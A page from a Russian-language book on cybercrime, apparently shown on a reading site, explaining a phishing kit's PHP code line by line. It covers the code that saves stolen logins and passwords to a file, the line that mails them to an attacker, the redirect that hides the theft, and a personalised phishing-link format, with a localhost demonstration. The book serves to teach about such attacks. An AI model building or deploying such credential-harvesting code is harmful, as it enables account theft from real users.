Особенности киберпреступлений в России: инструменты нападения и защиты информации (Масалков) - страница 31

На первую страницу
google.com.

Можно задать любой ресурс для возврата пользователя, практически все, что угодно, но злоумышленники в целях конспирации отправляют пользователя обратно «домой» в его учетную запись на родной официальный почтовый сервер, откуда его обманом и вытянули.

Операции в строке

if($login == "" || $pass == "") { header("Location: index. php?err&login=".$login); exit; }

осуществляют проверку на возможность пустых значений вместо введенных пользователем своих данных о логине и пароле. Следующий блок строк:

if($valid_file!= "")

{

$file = fopen($valid_file, 'a'); fwrite($file, "$login:$pass\r\n"); fclose($file);

}

В этом месте скрипт открывает файл, предназначенный для записи украденных данных, и осуществляет в него запись логина и пароля пользователя. В приведенном примере в текстовый файл aspushkin.txt по порядку записываются поступающие данные, после чего файл закрывается.

Стоит также обратить внимание на строки:

if($email!= "") mail($email, "Data from google", "$login:$pass"); header('Location: '.$location);

При выполнении функций первой строки осуществляется отправка данных на установленный в настройках движка электронный потовый адрес злоумышленника, а второй отправляет пользователя по заданному адресу, после чего шоу окончено.

Пройдем этот путь. Открываем наш localhost, работающий под установленной ранее AMPPS, и наблюдаем интерфейс подставного почтового сервера, который так и манит ввести логин и пароль (рис. 1.26).



Рис. 1.26.Интерфейс фишинг-движка


Нужно понимать, что на эту страницу фэйка пользователь попадает по ссылке вида:

http://ФИШИНГ-ДОМЕН/?Login=ЛОГИН-ПОЛЬЗОВАТЕЛЯ&Domain=ДОМЕН ПОЛЬЗОВАТЕЛЯ&id=mojnovstavitidnuonnenujen12433644800000023780&msg=chtotoochennujnoe17823612391283756

В данном случае используется тривиальная, но великолепная возможность языка PHP под определением «ассоциативный массив параметров, переданных скрипту через URL».

Если проще, то данная возможность позволяет передавать данные, внедряя их в строку ссылки. Поэтому нужно открыть эту страницу правильно. Вот так, например, на страницу попадает пользователь с логином «pochtauserar» по ссылке http://localhost/mdex.php?login=pochtauserar& (рис. 1.27):



Рис. 1.27.Интерфейс фэйка с именем пользователя, переданным через строку ссылки


Теперь интерфейс фишинг-движка встречает нас практически персонально, с указанием нашего логина электронной почты на странице.

Не будем заставлять его долго ждать и введем свои учетные данные, а вернее пароль: «superpassword».

Если проверить теперь файл aspushkin.txt, можно убедиться, что введенный пароль, а также имя нашей учетной записи успешно записаны в файл: «pochtauserar: superpassword».

Следующая страница